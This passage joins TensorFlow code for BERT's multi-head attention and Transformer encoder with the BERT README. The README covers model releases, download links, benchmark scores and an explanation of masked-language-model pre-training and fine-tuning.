do_return_2d_tensor=False, batch_size=None, from_seq_length=None, to_seq_length=None): """Performs multi-headed attention from `from_tensor` to `to_tensor`. This is an implementation of multi-headed attention based on "Attention is all you Need". If `from_tensor` and `to_tensor` are the same, then this is self-attention. Each timestep in `from_tensor` attends to the corresponding sequence in `to_tensor`, and returns a fixed-with vector. This function first projects `from_tensor` into a "query" tensor and `to_tensor` into "key" and "value" tensors. These are (effectively) a list of tensors of length `num_attention_heads`, where each tensor is of shape [batch_size, seq_length, size_per_head]. Then, the query and key tensors are dot-producted and scaled. These are softmaxed to obtain attention probabilities. The value tensors are then interpolated by these probabilities, then concatenated back to a single tensor and returned. In practice, the multi-headed attention are done with transposes and reshapes rather than actual separate tensors. Args: from_tensor: float Tensor of shape [batch_size, from_seq_length, from_width]. to_tensor: float Tensor of shape [batch_size, to_seq_length, to_width]. attention_mask: (optional) int32 Tensor of shape [batch_size, from_seq_length, to_seq_length]. The values should be 1 or 0. 
The attention scores will effectively be set to -infinity for any positions in the mask that are 0, and will be unchanged for positions that are 1. num_attention_heads: int. Number of attention heads. size_per_head: int. Size of each attention head. query_act: (optional) Activation function for the query transform. key_act: (optional) Activation function for the key transform. value_act: (optional) Activation function for the value transform. attention_probs_dropout_prob: (optional) float. Dropout probability of the attention probabilities. initializer_range: float. Range of the weight initializer. do_return_2d_tensor: bool. If True, the output will be of shape [batch_size * from_seq_length, num_attention_heads * size_per_head]. If False, the output will be of shape [batch_size, from_seq_length, num_attention_heads * size_per_head]. batch_size: (Optional) int. If the input is 2D, this might be the batch size of the 3D version of the `from_tensor` and `to_tensor`. from_seq_length: (Optional) If the input is 2D, this might be the seq length of the 3D version of the `from_tensor`. to_seq_length: (Optional) If the input is 2D, this might be the seq length of the 3D version of the `to_tensor`. Returns: float Tensor of shape [batch_size, from_seq_length, num_attention_heads * size_per_head]. (If `do_return_2d_tensor` is true, this will be of shape [batch_size * from_seq_length, num_attention_heads * size_per_head]). Raises: ValueError: Any of the arguments or tensor shapes are invalid. """ def transpose_for_scores(input_tensor, batch_size, num_attention_heads, seq_length, width): output_tensor = tf.reshape( input_tensor, [batch_size, seq_length, num_attention_heads, width]) output_tensor = tf.transpose(output_tensor, [0, 2, 1, 3]) return output_tensor from_shape = get_shape_list(from_tensor, expected_rank=[2, 3]) to_shape = get_shape_list(to_tensor, expected_rank=[2, 3]) if len(from_shape) != len(to_shape): raise ValueError( "The rank of `from_tensor` must match the rank of `to_tensor`.") if len(from_shape) == 3: batch_size = from_shape[0] from_seq_length = from_shape[1] to_seq_length = to_shape[1] elif len(from_shape) == 2: if (batch_size is None or from_seq_length is None or to_seq_length is None): raise ValueError( "When passing in rank 2 tensors to attention_layer, the values " "for `batch_size`, `from_seq_length`, and `to_seq_length` " "must all be specified.") # Scalar dimensions referenced here: # B = batch size (number of sequences) # F = `from_tensor` sequence length # T = `to_tensor` sequence length # N = `num_attention_heads` # H = `size_per_head` from_tensor_2d = reshape_to_matrix(from_tensor) to_tensor_2d = reshape_to_matrix(to_tensor) # `query_layer` = [B*F, N*H] query_layer = tf.layers.dense( from_tensor_2d, num_attention_heads * size_per_head, activation=query_act, name="query", kernel_initializer=create_initializer(initializer_range)) # `key_layer` = [B*T, N*H] key_layer = tf.layers.dense( to_tensor_2d, num_attention_heads * size_per_head, activation=key_act, name="key", kernel_initializer=create_initializer(initializer_range)) # `value_layer` = [B*T, N*H] value_layer = tf.layers.dense( to_tensor_2d, num_attention_heads * size_per_head, activation=value_act, name="value", kernel_initializer=create_initializer(initializer_range)) # `query_layer` = [B, N, F, H] query_layer = transpose_for_scores(query_layer, batch_size, num_attention_heads, from_seq_length, size_per_head) # `key_layer` = [B, N, T, H] key_layer = transpose_for_scores(key_layer, batch_size, num_attention_heads, 
to_seq_length, size_per_head) # Take the dot product between "query" and "key" to get the raw # attention scores. # `attention_scores` = [B, N, F, T] attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True) attention_scores = tf.multiply(attention_scores, 1.0 / math.sqrt(float(size_per_head))) if attention_mask is not None: # `attention_mask` = [B, 1, F, T] attention_mask = tf.expand_dims(attention_mask, axis=[1]) # Since attention_mask is 1.0 for positions we want to attend and 0.0 for # masked positions, this operation will create a tensor which is 0.0 for # positions we want to attend and -10000.0 for masked positions. adder = (1.0 - tf.cast(attention_mask, tf.float32)) * -10000.0 # Since we are adding it to the raw scores before the softmax, this is # effectively the same as removing these entirely. attention_scores += adder # Normalize the attention scores to probabilities. # `attention_probs` = [B, N, F, T] attention_probs = tf.nn.softmax(attention_scores) # This is actually dropping out entire tokens to attend to, which might # seem a bit unusual, but is taken from the original Transformer paper. attention_probs = dropout(attention_probs, attention_probs_dropout_prob) # `value_layer` = [B, T, N, H] value_layer = tf.reshape( value_layer, [batch_size, to_seq_length, num_attention_heads, size_per_head]) # `value_layer` = [B, N, T, H] value_layer = tf.transpose(value_layer, [0, 2, 1, 3]) # `context_layer` = [B, N, F, H] context_layer = tf.matmul(attention_probs, value_layer) # `context_layer` = [B, F, N, H] context_layer = tf.transpose(context_layer, [0, 2, 1, 3]) if do_return_2d_tensor: # `context_layer` = [B*F, N*H] context_layer = tf.reshape( context_layer, [batch_size * from_seq_length, num_attention_heads * size_per_head]) else: # `context_layer` = [B, F, N*H] context_layer = tf.reshape( context_layer, [batch_size, from_seq_length, num_attention_heads * size_per_head]) return context_layer def transformer_model(input_tensor, attention_mask=None, hidden_size=768, num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072, intermediate_act_fn=gelu, hidden_dropout_prob=0.1, attention_probs_dropout_prob=0.1, initializer_range=0.02, do_return_all_layers=False): """Multi-headed, multi-layer Transformer from "Attention is All You Need". This is almost an exact implementation of the original Transformer encoder. See the original paper: https://arxiv.org/abs/1706.03762 Also see: https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/transformer.py Args: input_tensor: float Tensor of shape [batch_size, seq_length, hidden_size]. attention_mask: (optional) int32 Tensor of shape [batch_size, seq_length, seq_length], with 1 for positions that can be attended to and 0 in positions that should not be. hidden_size: int. Hidden size of the Transformer. num_hidden_layers: int. Number of layers (blocks) in the Transformer. num_attention_heads: int. Number of attention heads in the Transformer. intermediate_size: int. The size of the "intermediate" (a.k.a., feed forward) layer. intermediate_act_fn: function. The non-linear activation function to apply to the output of the intermediate/feed-forward layer. hidden_dropout_prob: float. Dropout probability for the hidden layers. attention_probs_dropout_prob: float. Dropout probability of the attention probabilities. initializer_range: float. Range of the initializer (stddev of truncated normal). do_return_all_layers: Whether to also return all layers or just the final layer. 
Returns: float Tensor of shape [batch_size, seq_length, hidden_size], the final hidden layer of the Transformer. Raises: ValueError: A Tensor shape or parameter is invalid. """ if hidden_size % num_attention_heads != 0: raise ValueError( "The hidden size (%d) is not a multiple of the number of attention " "heads (%d)" % (hidden_size, num_attention_heads)) attention_head_size = int(hidden_size / num_attention_heads) input_shape = get_shape_list(input_tensor, expected_rank=3) batch_size = input_shape[0] seq_length = input_shape[1] input_width = input_shape[2] # The Transformer performs sum residuals on all layers so the input needs # to be the same as the hidden size. if input_width != hidden_size: raise ValueError("The width of the input tensor (%d) != hidden size (%d)" % (input_width, hidden_size)) # We keep the representation as a 2D tensor to avoid re-shaping it back and # forth from a 3D tensor to a 2D tensor. Re-shapes are normally free on # the GPU/CPU but may not be free on the TPU, so we want to minimize them to # help the optimizer. prev_output = reshape_to_matrix(input_tensor) all_layer_outputs = [] for layer_idx in range(num_hidden_layers): with tf.variable_scope("layer_%d" % layer_idx): layer_input = prev_output with tf.variable_scope("attention"): attention_heads = [] with tf.variable_scope("self"): attention_head = attention_layer( from_tensor=layer_input, to_tensor=layer_input, attention_mask=attention_mask, num_attention_heads=num_attention_heads, size_per_head=attention_head_size, attention_probs_dropout_prob=attention_probs_dropout_prob, initializer_range=initializer_range, do_return_2d_tensor=True, batch_size=batch_size, from_seq_length=seq_length, to_seq_length=seq_length) attention_heads.append(attention_head) attention_output = None if len(attention_heads) == 1: attention_output = attention_heads[0] else: # In the case where we have other sequences, we just concatenate # them to the self-attention head before the projection. attention_output = tf.concat(attention_heads, axis=-1) # Run a linear projection of `hidden_size` then add a residual # with `layer_input`. with tf.variable_scope("output"): attention_output = tf.layers.dense( attention_output, hidden_size, kernel_initializer=create_initializer(initializer_range)) attention_output = dropout(attention_output, hidden_dropout_prob) attention_output = layer_norm(attention_output + layer_input) # The activation is only applied to the "intermediate" hidden layer. with tf.variable_scope("intermediate"): intermediate_output = tf.layers.dense( attention_output, intermediate_size, activation=intermediate_act_fn, kernel_initializer=create_initializer(initializer_range)) # Down-project back to `hidden_size` then add the residual. with tf.variable_scope("output"): layer_output = tf.layers.dense( intermediate_output, hidden_size, kernel_initializer=create_initializer(initializer_range)) layer_output = dropout(layer_output, hidden_dropout_prob) layer_output = layer_norm(layer_output + attention_output) prev_output = layer_output all_layer_outputs.append(layer_output) if do_return_all_layers: final_outputs = [] for layer_output in all_layer_outputs: final_output = reshape_from_matrix(layer_output, input_shape) final_outputs.append(final_output) return final_outputs else: final_output = reshape_from_matrix(prev_output, input_shape) return final_output def get_shape_list(tensor, expected_rank=None, name=None): """Returns a list of the shape of tensor, preferring static dimensions. 
Args: tensor: A tf.Tensor object to find the shape of. expected_rank: (optional) int. The expected rank of `tensor`. If this is specified and the `tensor` has a different rank, and exception will be thrown. name: Optional name of the tensor for the error message. Returns: A list of dimensions of the shape of tensor. All static dimensions will be returned as python integers, and dynamic dimensions will be returned as tf.Tensor scalars. """ if name is None: name = tensor.name if expected_rank is not None: assert_rank(tensor, expected_rank, name) shape = tensor.shape.as_list() non_static_indexes = [] for (index, dim) in enumerate(shape): if dim is None: non_static_indexes.append(index) if not non_static_indexes: return shape dyn_shape = tf.shape(tensor) for index in non_static_indexes: shape[index] = dyn_shape[index] return shape def reshape_to_matrix(input_tensor): """Reshapes a >= rank 2 tensor to a rank 2 tensor (i.e., a matrix).""" ndims = input_tensor.shape.ndims if ndims < 2: raise ValueError("Input tensor must have at least rank 2. Shape = %s" % (input_tensor.shape)) if ndims == 2: return input_tensor width = input_tensor.shape[-1] output_tensor = tf.reshape(input_tensor, [-1, width]) return output_tensor def reshape_from_matrix(output_tensor, orig_shape_list): """Reshapes a rank 2 tensor back to its original rank >= 2 tensor.""" if len(orig_shape_list) == 2: return output_tensor output_shape = get_shape_list(output_tensor) orig_dims = orig_shape_list[0:-1] width = output_shape[-1] return tf.reshape(output_tensor, orig_dims + [width]) def assert_rank(tensor, expected_rank, name=None): """Raises an exception if the tensor rank is not of the expected rank. Args: tensor: A tf.Tensor to check the rank of. expected_rank: Python integer or list of integers, expected rank. name: Optional name of the tensor for the error message. Raises: ValueError: If the expected shape doesn't match the actual shape. """ if name is None: name = tensor.name expected_rank_dict = {} if isinstance(expected_rank, six.integer_types): expected_rank_dict[expected_rank] = True else: for x in expected_rank: expected_rank_dict[x] = True actual_rank = tensor.shape.ndims if actual_rank not in expected_rank_dict: scope_name = tf.get_variable_scope().name raise ValueError( "For the tensor `%s` in scope `%s`, the actual rank " "`%d` (shape = %s) is not equal to the expected rank `%s`" % (name, scope_name, actual_rank, str(tensor.shape), str(expected_rank)))
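

# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original modeling.py). It shows
# that get_shape_list() returns plain Python ints for statically known
# dimensions and tf.Tensor scalars for dynamic ones, which is why callers
# above can index the result without knowing which case they are in.
if __name__ == "__main__":
  _demo_ids = tf.placeholder(tf.int32, shape=[None, 128], name="demo_input_ids")
  _demo_shape = get_shape_list(_demo_ids, expected_rank=2)
  # _demo_shape[0] is a tf.Tensor (dynamic batch size); _demo_shape[1] is 128.
  print(_demo_shape)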
# BERT **\*\*\*\*\* New March 11th, 2020: Smaller BERT Models \*\*\*\*\*** This is a release of 24 smaller BERT models (English only, uncased, trained with WordPiece masking) referenced in [Well-Read Students Learn Better: On the Importance of Pre-training Compact Models](https://arxiv.org/abs/1908.08962). We have shown that the standard BERT recipe (including model architecture and training objective) is effective on a wide range of model sizes, beyond BERT-Base and BERT-Large. The smaller BERT models are intended for environments with restricted computational resources. They can be fine-tuned in the same manner as the original BERT models. However, they are most effective in the context of knowledge distillation, where the fine-tuning labels are produced by a larger and more accurate teacher. Our goal is to enable research in institutions with fewer computational resources and encourage the community to seek directions of innovation alternative to increasing model capacity. You can download all 24 from [here][all], or individually from the table below: | |H=128|H=256|H=512|H=768| |---|:---:|:---:|:---:|:---:| | **L=2** |[**2/128 (BERT-Tiny)**][2_128]|[2/256][2_256]|[2/512][2_512]|[2/768][2_768]| | **L=4** |[4/128][4_128]|[**4/256 (BERT-Mini)**][4_256]|[**4/512 (BERT-Small)**][4_512]|[4/768][4_768]| | **L=6** |[6/128][6_128]|[6/256][6_256]|[6/512][6_512]|[6/768][6_768]| | **L=8** |[8/128][8_128]|[8/256][8_256]|[**8/512 (BERT-Medium)**][8_512]|[8/768][8_768]| | **L=10** |[10/128][10_128]|[10/256][10_256]|[10/512][10_512]|[10/768][10_768]| | **L=12** |[12/128][12_128]|[12/256][12_256]|[12/512][12_512]|[**12/768 (BERT-Base)**][12_768]| Note that the BERT-Base model in this release is included for completeness only; it was re-trained under the same regime as the original model. 
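
Because the smaller models are most effective as students of a larger, fine-tuned teacher, a minimal sketch of such a distillation objective may help. This sketch is not part of the released code, and the function and argument names are illustrative only:

```python
import tensorflow as tf


def distillation_loss(teacher_logits, student_logits, temperature=1.0):
  """Soft cross-entropy between teacher and student predictions (sketch only)."""
  # The fine-tuned teacher provides the soft fine-tuning labels mentioned above.
  teacher_probs = tf.nn.softmax(teacher_logits / temperature)
  student_log_probs = tf.nn.log_softmax(student_logits / temperature)
  per_example_loss = -tf.reduce_sum(teacher_probs * student_log_probs, axis=-1)
  return tf.reduce_mean(per_example_loss)
```

In such a setup the student is one of the compact checkpoints above, fine-tuned in the same manner as BERT-Base but with this soft-label loss (optionally mixed with the usual hard-label cross-entropy) as the training objective.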
Here are the corresponding GLUE scores on the test set: |Model|Score|CoLA|SST-2|MRPC|STS-B|QQP|MNLI-m|MNLI-mm|QNLI(v2)|RTE|WNLI|AX| |---|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:| |BERT-Tiny|64.2|0.0|83.2|81.1/71.1|74.3/73.6|62.2/83.4|70.2|70.3|81.5|57.2|62.3|21.0| |BERT-Mini|65.8|0.0|85.9|81.1/71.8|75.4/73.3|66.4/86.2|74.8|74.3|84.1|57.9|62.3|26.1| |BERT-Small|71.2|27.8|89.7|83.4/76.2|78.8/77.0|68.1/87.0|77.6|77.0|86.4|61.8|62.3|28.6| |BERT-Medium|73.5|38.0|89.6|86.6/81.6|80.4/78.4|69.6/87.9|80.0|79.1|87.7|62.2|62.3|30.5| For each task, we selected the best fine-tuning hyperparameters from the lists below, and trained for 4 epochs: - batch sizes: 8, 16, 32, 64, 128 - learning rates: 3e-4, 1e-4, 5e-5, 3e-5 If you use these models, please cite the following paper: ``` @article{turc2019, title={Well-Read Students Learn Better: On the Importance of Pre-training Compact Models}, author={Turc, Iulia and Chang, Ming-Wei and Lee, Kenton and Toutanova, Kristina}, journal={arXiv preprint arXiv:1908.08962v2 }, year={2019} } ``` [2_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-2_H-128_A-2.zip [2_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-2_H-256_A-4.zip [2_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-2_H-512_A-8.zip [2_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-2_H-768_A-12.zip [4_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-4_H-128_A-2.zip [4_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-4_H-256_A-4.zip [4_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-4_H-512_A-8.zip [4_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-4_H-768_A-12.zip [6_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-6_H-128_A-2.zip [6_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-6_H-256_A-4.zip [6_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-6_H-512_A-8.zip [6_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-6_H-768_A-12.zip [8_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-8_H-128_A-2.zip [8_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-8_H-256_A-4.zip [8_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-8_H-512_A-8.zip [8_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-8_H-768_A-12.zip [10_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-10_H-128_A-2.zip [10_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-10_H-256_A-4.zip [10_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-10_H-512_A-8.zip [10_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-10_H-768_A-12.zip [12_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-12_H-128_A-2.zip [12_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-12_H-256_A-4.zip [12_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-12_H-512_A-8.zip [12_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-12_H-768_A-12.zip [all]: https://storage.googleapis.com/bert_models/2020_02_20/all_bert_models.zip **\*\*\*\*\* New May 31st, 2019: Whole Word Masking Models \*\*\*\*\*** This is a release of several new models which were the result of an improvement the pre-processing code. 
In the original pre-processing code, we randomly select WordPiece tokens to
mask. For example:

`Input Text: the man jumped up , put his basket on phil ##am ##mon ' s head`

`Original Masked Input: [MASK] man [MASK] up , put his [MASK] on phil [MASK] ##mon ' s head`

The new technique is called Whole Word Masking. In this case, we always mask
*all* of the tokens corresponding to a word at once. The overall masking rate
remains the same.

`Whole Word Masked Input: the man [MASK] up , put his basket on [MASK] [MASK] [MASK] ' s head`

The training is identical -- we still predict each masked WordPiece token
independently. The improvement comes from the fact that the original
prediction task was too 'easy' for words that had been split into multiple
WordPieces.

This can be enabled during data generation by passing the flag
`--do_whole_word_mask=True` to `create_pretraining_data.py`.

Pre-trained models with Whole Word Masking are linked below. The data and
training were otherwise identical, and the models have identical structure and
vocab to the original models. We only include BERT-Large models. When using
these models, please make it clear in the paper that you are using the Whole
Word Masking variant of BERT-Large.

* **[`BERT-Large, Uncased (Whole Word Masking)`](https://storage.googleapis.com/bert_models/2019_05_30/wwm_uncased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters

* **[`BERT-Large, Cased (Whole Word Masking)`](https://storage.googleapis.com/bert_models/2019_05_30/wwm_cased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters

Model                                    | SQUAD 1.1 F1/EM | Multi NLI Accuracy
---------------------------------------- | :-------------: | :----------------:
BERT-Large, Uncased (Original)           | 91.0/84.3       | 86.05
BERT-Large, Uncased (Whole Word Masking) | 92.8/86.7       | 87.07
BERT-Large, Cased (Original)             | 91.5/84.8       | 86.09
BERT-Large, Cased (Whole Word Masking)   | 92.9/86.7       | 86.46

**\*\*\*\*\* New February 7th, 2019: TfHub Module \*\*\*\*\***

BERT has been uploaded to [TensorFlow Hub](https://tfhub.dev). See
`run_classifier_with_tfhub.py` for an example of how to use the TF Hub module,
or run an example in the browser on
[Colab](https://colab.sandbox.google.com/github/google-research/bert/blob/master/predicting_movie_reviews_with_bert_on_tf_hub.ipynb).

**\*\*\*\*\* New November 23rd, 2018: Un-normalized multilingual model + Thai + Mongolian \*\*\*\*\***

We uploaded a new multilingual model which does *not* perform any normalization
on the input (no lower casing, accent stripping, or Unicode normalization), and
additionally includes Thai and Mongolian.

**It is recommended to use this version for developing multilingual models,
especially on languages with non-Latin alphabets.**

This does not require any code changes, and can be downloaded here:

* **[`BERT-Base, Multilingual Cased`](https://storage.googleapis.com/bert_models/2018_11_23/multi_cased_L-12_H-768_A-12.zip)**: 104 languages, 12-layer, 768-hidden, 12-heads, 110M parameters

**\*\*\*\*\* New November 15th, 2018: SOTA SQuAD 2.0 System \*\*\*\*\***

We released code changes to reproduce our 83% F1 SQuAD 2.0 system, which is
currently 1st place on the leaderboard by 3%. See the SQuAD 2.0 section of the
README for details.
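
The word-grouping step behind Whole Word Masking (described in the May 31st, 2019 note above) can be sketched in a few lines. This is an illustrative simplification; the released implementation lives in `create_masked_lm_predictions` inside `create_pretraining_data.py`:

```python
def group_whole_words(tokens):
  """Groups WordPiece indexes so that each group covers one original word."""
  groups = []
  for i, token in enumerate(tokens):
    if token in ("[CLS]", "[SEP]"):
      continue
    if groups and token.startswith("##"):
      groups[-1].append(i)  # continuation piece: same word as the previous token
    else:
      groups.append([i])    # start of a new word
  return groups

tokens = "the man jumped up , put his basket on phil ##am ##mon ' s head".split()
print(group_whole_words(tokens))
# "phil", "##am" and "##mon" form one group, so with --do_whole_word_mask=True
# they are masked (or kept) together; the per-token prediction objective itself
# is unchanged.
```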
**\*\*\*\*\* New November 5th, 2018: Third-party PyTorch and Chainer versions of BERT available \*\*\*\*\*** NLP researchers from HuggingFace made a [PyTorch version of BERT available](https://github.com/huggingface/pytorch-pretrained-BERT) which is compatible with our pre-trained checkpoints and is able to reproduce our results. Sosuke Kobayashi also made a [Chainer version of BERT available](https://github.com/soskek/bert-chainer) (Thanks!) We were not involved in the creation or maintenance of the PyTorch implementation so please direct any questions towards the authors of that repository. **\*\*\*\*\* New November 3rd, 2018: Multilingual and Chinese models available \*\*\*\*\*** We have made two new BERT models available: * **[`BERT-Base, Multilingual`](https://storage.googleapis.com/bert_models/2018_11_03/multilingual_L-12_H-768_A-12.zip) (Not recommended, use `Multilingual Cased` instead)**: 102 languages, 12-layer, 768-hidden, 12-heads, 110M parameters * **[`BERT-Base, Chinese`](https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip)**: Chinese Simplified and Traditional, 12-layer, 768-hidden, 12-heads, 110M parameters We use character-based tokenization for Chinese, and WordPiece tokenization for all other languages. Both models should work out-of-the-box without any code changes. We did update the implementation of `BasicTokenizer` in `tokenization.py` to support Chinese character tokenization, so please update if you forked it. However, we did not change the tokenization API. For more, see the [Multilingual README](https://github.com/google-research/bert/blob/master/multilingual.md). **\*\*\*\*\* End new information \*\*\*\*\*** ## Introduction **BERT**, or **B**idirectional **E**ncoder **R**epresentations from **T**ransformers, is a new method of pre-training language representations which obtains state-of-the-art results on a wide array of Natural Language Processing (NLP) tasks. Our academic paper which describes BERT in detail and provides full results on a number of tasks can be found here: [https://arxiv.org/abs/1810.04805](https://arxiv.org/abs/1810.04805). To give a few numbers, here are the results on the [SQuAD v1.1](https://rajpurkar.github.io/SQuAD-explorer/) question answering task: SQuAD v1.1 Leaderboard (Oct 8th 2018) | Test EM | Test F1 ------------------------------------- | :------: | :------: 1st Place Ensemble - BERT | **87.4** | **93.2** 2nd Place Ensemble - nlnet | 86.0 | 91.7 1st Place Single Model - BERT | **85.1** | **91.8** 2nd Place Single Model - nlnet | 83.5 | 90.1 And several natural language inference tasks: System | MultiNLI | Question NLI | SWAG ----------------------- | :------: | :----------: | :------: BERT | **86.7** | **91.1** | **86.3** OpenAI GPT (Prev. SOTA) | 82.2 | 88.1 | 75.0 Plus many other tasks. Moreover, these results were all obtained with almost no task-specific neural network architecture design. If you already know what BERT is and you just want to get started, you can [download the pre-trained models](#pre-trained-models) and [run a state-of-the-art fine-tuning](#fine-tuning-with-bert) in only a few minutes. ## What is BERT? BERT is a method of pre-training language representations, meaning that we train a general-purpose "language understanding" model on a large text corpus (like Wikipedia), and then use that model for downstream NLP tasks that we care about (like question answering). 
BERT outperforms previous methods because it is the first *unsupervised*, *deeply bidirectional* system for pre-training NLP. *Unsupervised* means that BERT was trained using only a plain text corpus, which is important because an enormous amount of plain text data is publicly available on the web in many languages. Pre-trained representations can also either be *context-free* or *contextual*, and contextual representations can further be *unidirectional* or *bidirectional*. Context-free models such as [word2vec](https://www.tensorflow.org/tutorials/representation/word2vec) or [GloVe](https://nlp.stanford.edu/projects/glove/) generate a single "word embedding" representation for each word in the vocabulary, so `bank` would have the same representation in `bank deposit` and `river bank`. Contextual models instead generate a representation of each word that is based on the other words in the sentence. BERT was built upon recent work in pre-training contextual representations — including [Semi-supervised Sequence Learning](https://arxiv.org/abs/1511.01432), [Generative Pre-Training](https://blog.openai.com/language-unsupervised/), [ELMo](https://allennlp.org/elmo), and [ULMFit](http://nlp.fast.ai/classification/2018/05/15/introducting-ulmfit.html) — but crucially these models are all *unidirectional* or *shallowly bidirectional*. This means that each word is only contextualized using the words to its left (or right). For example, in the sentence `I made a bank deposit` the unidirectional representation of `bank` is only based on `I made a` but not `deposit`. Some previous work does combine the representations from separate left-context and right-context models, but only in a "shallow" manner. BERT represents "bank" using both its left and right context — `I made a ... deposit` — starting from the very bottom of a deep neural network, so it is *deeply bidirectional*. BERT uses a simple approach for this: We mask out 15% of the words in the input, run the entire sequence through a deep bidirectional [Transformer](https://arxiv.org/abs/1706.03762) encoder, and then predict only the masked words. For example: ``` Input: the man went to the [MASK1] . he bought a [MASK2] of milk. Labels: [MASK1] = store; [MASK2] = gallon ``` In order to learn relationships between sentences, we also train on a simple task which can be generated from any monolingual corpus: Given two sentences `A` and `B`, is `B` the actual next sentence that comes after `A`, or just a random sentence from the corpus? ``` Sentence A: the man went to the store . Sentence B: he bought a gallon of milk . Label: IsNextSentence ``` ``` Sentence A: the man went to the store . Sentence B: penguins are flightless . Label: NotNextSentence ``` We then train a large model (12-layer to 24-layer Transformer) on a large corpus (Wikipedia + [BookCorpus](http://yknzhu.wixsite.com/mbweb)) for a long time (1M update steps), and that's BERT. Using BERT has two stages: *Pre-training* and *fine-tuning*. **Pre-training** is fairly expensive (four days on 4 to 16 Cloud TPUs), but is a one-time procedure for each language (current models are English-only, but multilingual models will be released in the near future). We are releasing a number of pre-trained models from the paper which were pre-trained at Google. Most NLP researchers will never need to pre-train their own model from scratch. **Fine-tuning** is inexpensive. 
All of the results in the paper can be replicated in at most 1 hour on a single Cloud TPU, or a few hours on a GPU, starting from the exact same pre-trained model. SQuAD, for example, can be trained in around 30 minutes on a single Cloud TPU to achieve a Dev F1 score of 91.0%, which is the single system state-of-the-art. The other important aspect of BERT is that it can be adapted to many types of NLP tasks very easily. In the paper, we demonstrate state-of-the-art results on sentence-level (e.g., SST-2), sentence-pair-level (e.g., MultiNLI), word-level (e.g., NER), and span-level (e.g., SQuAD) tasks with almost no task-specific modifications. ## What has been released in this repository? We are releasing the following: * TensorFlow code for the BERT model architecture (which is mostly a standard [Transformer](https://arxiv.org/abs/1706.03762) architecture). * Pre-trained checkpoints for both the lowercase and cased version of `BERT-Base` and `BERT-Large` from the paper. * TensorFlow code for push-button replication of the most important fine-tuning experiments from the paper, including SQuAD, MultiNLI, and MRPC. All of the code in this repository works out-of-the-box with CPU, GPU, and Cloud TPU. ## Pre-trained models We are releasing the `BERT-Base` and `BERT-Large` models from the paper. `Uncased` means that the text has been lowercased before WordPiece tokenization, e.g., `John Smith` becomes `john smith`. The `Uncased` model also strips out any accent markers. `Cased` means that the true case and accent markers are preserved. Typically, the `Uncased` model is better unless you know that case information is important for your task (e.g., Named Entity Recognition or Part-of-Speech tagging). These models are all released under the same license as the source code (Apache 2.0). For information about the Multilingual and Chinese model, see the [Multilingual README](https://github.com/google-research/bert/blob/master/multilingual.md). **When using a cased model, make sure to pass `--do_lower=False` to the training scripts. (Or pass `do_lower_case=False` directly to `FullTokenizer` if you're using your own script.)** The links to the models are here (right-click, 'Save link as...' 
on the name): * **[`BERT-Large, Uncased (Whole Word Masking)`](https://storage.googleapis.com/bert_models/2019_05_30/wwm_uncased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters * **[`BERT-Large, Cased (Whole Word Masking)`](https://storage.googleapis.com/bert_models/2019_05_30/wwm_cased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters * **[`BERT-Base, Uncased`](https://storage.googleapis.com/bert_models/2018_10_18/uncased_L-12_H-768_A-12.zip)**: 12-layer, 768-hidden, 12-heads, 110M parameters * **[`BERT-Large, Uncased`](https://storage.googleapis.com/bert_models/2018_10_18/uncased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters * **[`BERT-Base, Cased`](https://storage.googleapis.com/bert_models/2018_10_18/cased_L-12_H-768_A-12.zip)**: 12-layer, 768-hidden, 12-heads , 110M parameters * **[`BERT-Large, Cased`](https://storage.googleapis.com/bert_models/2018_10_18/cased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters * **[`BERT-Base, Multilingual Cased (New, recommended)`](https://storage.googleapis.com/bert_models/2018_11_23/multi_cased_L-12_H-768_A-12.zip)**: 104 languages, 12-layer, 768-hidden, 12-heads, 110M parameters * **[`BERT-Base, Multilingual Uncased (Orig, not recommended)`](https://storage.googleapis.com/bert_models/2018_11_03/multilingual_L-12_H-768_A-12.zip) (Not recommended, use `Multilingual Cased` instead)**: 102 languages, 12-layer, 768-hidden, 12-heads, 110M parameters * **[`BERT-Base, Chinese`](https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip)**: Chinese Simplified and Traditional, 12-layer, 768-hidden, 12-heads, 110M parameters Each .zip file contains three items: * A TensorFlow checkpoint (`bert_model.ckpt`) containing the pre-trained weights (which is actually 3 files). * A vocab file (`vocab.txt`) to map WordPiece to word id. * A config file (`bert_config.json`) which 